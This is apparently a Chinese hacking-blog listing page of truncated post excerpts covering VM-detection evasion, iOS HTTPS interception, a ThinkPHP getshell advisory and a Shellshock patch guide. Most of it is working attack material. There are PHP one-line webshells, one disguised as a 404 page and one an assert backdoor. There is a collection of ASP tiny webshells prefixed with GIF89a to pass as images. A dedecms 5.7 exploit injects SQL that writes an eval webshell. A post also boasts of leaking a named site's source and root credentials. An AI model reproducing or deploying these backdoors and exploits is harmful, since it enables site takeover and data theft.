黑客技术

过SafeEngine VMware虚拟机检测

 .vmx 文件增加下面三行 disable_acceleration = "TRUE" monitor_control.restrict_backdoor = "TRUE" cpuid.1.ecx = "0111:1111:1101:1010:1111:1011:1011:1111" 虚拟机检测--注册表 HKLM\System\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-08002BE10318}\0000\DriverDesc 等含有VM的子键。 HKLM\HARDWARE\DESCRIPTION\System\BOIS\SystemManufacturer -- SafeEngine检测项

VMware 12虚拟机 安装 macOS S 10.13

 1. 我们可以通过下载苹果的破解版操作系统,即传说中的黑苹果系统,可直接安装到电脑上,还有一种方法是通过虚拟机(比如VirtualBox,Virtual Machine)来安装,这样我们即可用原来的操作系统,也可以尝一下苹果的操作系统是什么样的。我们说说在虚拟机上来安装Mac操作系统,这个对电脑有一定的要求,那就是你的电脑CPU需要支持VT技术,即虚拟技术。很多朋友也知道需要这个支持,但是却不知道自己电脑是否支持这个功能。这里提供了一个网上比较好用的检查工具(下载地址http://dl.pconline.com.cn/download/54540.html),通过它可以检查出你的CPU是否能够让你使用虚拟机来安装Mac,下面是我本机程序检测的结果: VT检测结果 看到第三项,Hardware Virtualization,如果该项显示如图说明你的CPU支持并已经打开了虚拟技术,那么恭喜你可以在你电脑上使用虚拟机来安装Mac操作系统了。需要注意的是,有些CPU本身支持VT技术,但是由于默认是关闭了该功能,因此如果该项显示的是Locked Off,那么重启电脑,并进入B...

ThinkPHP缓存函数设计缺陷导致Getshell漏洞

 ThinkPHP是一个开源、快速、兼容而且简单的轻量级国产PHP开发框架,由于ThinkPHP简洁实用、出色的性能和至简的代码,成为国内站长或企业网站使用较多的web框架。 近期,国内安全研究人员发现ThinkPHP在使用缓存的时候,由于缓存函数缺陷,导致可以远程Getshell,存在高危安全风险。 具体详情如下: 漏洞编号: 暂无 漏洞名称: ThinkPHP 缓存函数设计缺陷导致Getshell漏洞 官方评级: 高危 漏洞描述: 当用户使用了ThinkPHP 3.2.3-5.0.10版本并启用了缓存功能,远程攻击者可以使用精心构造的数据远程POST提交,触发该漏洞,并成功获取网站权限。 漏洞利用条件和方式: 启用缓存功能 远程利用 漏洞影响范围: ThinkPHP 3.2.3-5.0.10版本 漏洞检测: 检查是否使用了ThinkPHP 3.2.3-5.0.10版本并启用了缓存功能 漏洞修复建议(或缓解措施): 厂商暂未发布补丁,可以使用方式进行...

苹果ios9 抓包 两个工具分享

最近需要分析下一些苹果app的数据包,默认是https 也就抓不到真实数据,这里分享两款工具 国人写的工具(推荐):https://github.com/Yonsm/HttPeek 直接下载编译好的文件:点击下载 使用方法: 1.在已越狱的系统中安装 Cydia Substrate; 2.把 HttPeek.dylib 点击下载 放到 Cydia Substrate 的插件目录中(/Library/MobileSubstrate/DynamicLibraries),并重启设备或相关进程; 3.操作重现,确保你期望监听的 HTTP/HTTPS/UIWebView/SSL 请求已发生; 4.在 /tmp/%进程名称%.req 目录中获取改进程所有的 HTTP/HTTP/UIWebView/SSL 请求细节的日志 这个我还没细看先贴地址:https://github.com/nabla-c0d3/ssl-kill-switch2  

PHP一句话后门大全

我们以一个学习的心态来对待这些PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。 强悍的PHP一句话后门 这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。 利用404页面隐藏PHP小马: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html><?php @preg_replace("/[pageerror]/e",$_PO...

SSH bash紧急安全补丁以及修复办法编译打补丁升级bash修复漏洞

漏洞详情页面:http://seclists.org/oss-sec/2014/q3/650 漏洞级别:非常严重 漏洞信息: 1.测试是否存在漏洞,执行以下命令: env t='() { :;}; echo You are vulnerable.' bash -c "true" 复制代码 如果显示You are vulnerable,很遗憾,必须立即打上安全补丁修复 2.修复漏洞办法 Ubuntu or Debian 请执行 apt-get update apt-get upgrade ​ RedHat, CentOS or Fedora 请执行 yum clean all yum -y update bash 复制代码     先更新慢的 可以 手动 编译打补丁升级bash修复漏洞​ wget http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz tar zxf bash-4.3.tar.g...

PHP新型一句话后门

assert也可以直接执行php代码。 现在在本机模拟了下。 建一个post.html <form action = "test.php?page=assert" method = "post">  <input type = "text" name = "item" /> <input type = "submit" value = "运行" /> </form> 复制代码 复制代码 再建一个test.php <?php $_GET['page']($_POST['item']);  ?> 复制代码 复制代码 这个post.html在任何电脑上运行都可以,只要action的地址是那个test.php. 在输入框里输入: phpinfo(); 点击运行按钮, 尼玛 phpinfo就直接出来啦,太可怕了,这可以为所欲为了啊  ...

短小精悍asp小马大全

第一款 : GIF89a$       ;<hTml> <%eval request(chr(1))%> <% on error resume next testfile=Request.form("filepath") msg=Request.form("message") if Trim(request("filepath"))<>"" then set fs=server.CreateObject("scripting.filesystemobject") set thisfile=fs.CreateTextFile(testfile,True) thisfile.Write(""&msg& "") if err =0 Then response.write "<font color...

wanyx.com 爆源码 0DAY

著名单机游戏下载站 wanyx.com 今天偶然发现 直接爆 PHP 源代码   很容易就找到 配置文件,直接用的 root 账户。。。。 懒得提权了。 已经联系站长修复。

dedecms 5.7 Get Webshell ,大家注意安全!

网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell 前题条件,必须准备好自己的dede数据库,然后插入数据: 代码: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'<?php eval($_POST[c]) ?>\');echo "OK";@fclose($fp);{/dede:php}'); 再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 代码: <form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();"> <input type="text...